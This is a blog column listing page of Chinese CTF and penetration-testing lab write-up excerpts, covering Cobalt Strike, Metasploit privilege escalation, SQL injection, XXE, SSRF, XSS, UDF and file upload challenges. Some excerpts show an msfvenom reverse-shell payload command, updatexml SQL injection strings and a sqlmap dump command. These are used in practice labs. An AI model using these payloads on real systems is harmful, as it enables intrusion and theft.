CTF
文章平均质量分 83
CTF实战
孤桜懶契
这个作者很懒,什么都没留下…
展开
-
【远控使用】Cobalt Strike横向渗透域控
categories: 知识积累top: FALSEcopyright: trueabbrlink: 1643719980#date: '2021-8-7 12:00:00'#description:1400x780tags: 内网渗透提权渗透测试黑客工具photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png前言Cobalt Strike.原创 2021-09-11 11:43:45 · 2256 阅读 · 0 评论 -
【提权】提权扫描工具方法
前言提权扫描工具使用Windows-Exploit-SuggesterWindows-Exploit-Suggester这个工具很强,但是依赖更新了,所以有几个坑,我记录一下1、安装git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git2、安装依赖(有坑)由于最新版的xlrd对xls的处理方式不同了,导致这个脚本有使用会报错,所以我们使用老版本的xlrd,记得是如下命令python -m原创 2021-08-23 12:09:45 · 403 阅读 · 0 评论 -
【封神台】漏洞挖掘XXE wp
前言掌控安全里面的靶场漏洞挖掘XXE实体注入,学习一下!做XXE题目之前我们先了解一下XXE实体注入的原理和利用方法XXE基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成:元素、属性、实体、PCDATA、CDATA,由于网上太多介绍就不详细说了DTD(文档类型定原创 2021-08-23 05:31:43 · 560 阅读 · 0 评论 -
【提权】metasploit提权方法
前言metasploit 提权使用常用的提权模块metasploit 提权EXP存储文件夹路径find / -name metasploit一般都在/usr/share/metasploit-framework/modules/exploits/windows/localwindows2003提权环境:2003 server1、生成攻击载荷msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lpo原创 2021-08-22 22:13:45 · 834 阅读 · 0 评论 -
【ctfshow】web篇-SQL注入 wp
前言记录web的题目wp,慢慢变强,铸剑。SQL注入web171根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过//拼接sql语句查找指定ID用户$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行判断有3个字段原创 2021-08-21 22:25:42 · 4418 阅读 · 1 评论 -
ctfshow-ssrf
前言记录web的题目wp,慢慢变强,铸剑。SSRFSSRF(Server-Side Request Forgery: 服务器端请求第二天) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相关而与外部网隔离的内部系统)web351<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=cu原创 2021-08-21 20:32:40 · 307 阅读 · 0 评论 -
【封神台】数据库注入 wp
前言掌控安全里面的靶场前端渗透/XSS,学习一下!反射型XSS环境:http://b-ref-xss-1s.lab.aqlab.cn/了解一下一般证明XSS是否存在,就是在正常页面传参然后构建参数让他弹窗就是存在XSS了XSS一般在什么业务场景容易遇见?重灾区:评论区、留言区、个人信息、订单信息等。针对型:站内信、网页即时通讯、私信、意见反馈。存在风险:搜索框、当前目录、图片属性等。遵循一个原则,见框就X发现并没有什么反应,审计元素看看代码F12原创 2021-08-15 16:55:08 · 435 阅读 · 0 评论 -
【封神台】数据库注入 wp
前言掌控安全里面的靶场数据库注入,练练手!Access——Cookie注入环境http://59.63.200.79:8004/正常情况Cookie注入是可以通过post传参测试的上面通过改id的参数发现可以cookie注入,废话不多说,抓包,sqlmap走起python2 sqlmap.py -r 123.txt --batch --threads=10 -T admin --dumpMD5解密b9a2a2b5dffb918c ——>原创 2021-08-15 16:54:26 · 430 阅读 · 0 评论 -
【封神台】漏洞挖掘与代码审计 wp
前言掌控安全里面的靶场漏洞挖掘与代码审计,练练手!本地包含漏洞审计环境 :http://wjbh522a.zs.aqlab.cn/默认弱密码登陆 admin admin登陆之后发现是个4.8.1的版本,其实这题做的方法太多了,也可以不用代码审计,网上有一堆payload远程文件包含,不过这个靶场说下源代码审计,那就看看。下载源码:https://www.phpmyadmin.net/files/4.8.1/因为提示说了文件包含,直接全局搜索include分析原创 2021-08-15 16:53:45 · 618 阅读 · 0 评论 -
【SQL注入】UDF提权命令执行
一、什么是udfudf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。udf 文件后缀一般为 dll,由C、C++编写二、udf在渗透中的作用在一般渗透过程中,拿下一台windows服务器的webshell时,由于webshell权限较低,有些操作无法进行,而此时本地恰好存在mysql数据库,那么udf可能就派上用场原创 2021-08-15 16:53:06 · 4219 阅读 · 2 评论 -
【封神台】Sql-Labs wp
前言掌控安全里面的靶场Sql-Labs,练练手!环境:http://inject2.lab.aqlab.cn:81/pass-01$username = '';$password = '';@$id = $_GET['id'];@$sql = 'select *from user where id='.$id;mysqli_select_db($conn,'****');// 不想让你们知道库名$result = mysqli_query($conn,$sql);while ($原创 2021-08-15 16:52:19 · 495 阅读 · 0 评论 -
【封神台】upload-labs wp
前言掌控安全里面的靶场upload-labs,练练手!环境:http://59.63.200.79:8016/pass-01function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; }原创 2021-07-24 15:53:28 · 317 阅读 · 0 评论 -
第十四届全国大学生信息安全竞赛第一题wp
easy_sql1、通过报错注入获取flag的字段名id1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b)c)),0x2e)#2、通过的方式获取flag的字段名no1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b using(id))c)),0x2e)#原创 2021-05-16 16:23:21 · 558 阅读 · 1 评论